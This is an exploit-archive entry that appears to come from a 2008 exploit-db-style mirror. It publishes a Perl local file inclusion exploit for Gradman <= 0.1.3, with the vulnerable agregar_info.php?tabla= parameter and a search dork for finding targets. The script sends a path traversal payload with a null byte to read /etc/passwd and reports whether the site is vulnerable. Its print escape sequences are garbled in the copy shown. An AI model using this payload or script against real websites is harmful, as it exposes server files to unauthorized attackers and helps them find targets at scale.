[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit
# Published : 2008-01-16
# Author : JosS
# Previous Title : PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability
# Next Title : MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ Gradman <= 0.1.3 (agregar_info.php?tabla=) Local File Inclusion Exploit +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: Gradman <= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "powered by Gradman"
[~] Dork2: Priv8, xD!
[+] Exploit:
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "tt########################################################nn";
print "tt# Gradman <= 0.1.3 - Local File Inclusion Exploit #nn";
print "tt# by JosS #nn";
print "tt########################################################nn";
if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]n";
print "Example: perl xpl.pl http://localhost/gradman/n";
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";
my $web1=$web.$iny;
print "$web1nn";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vulnn";
}
else
{
print "Web is not vulnn";
}
}
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# www.Syue.com [2008-01-16]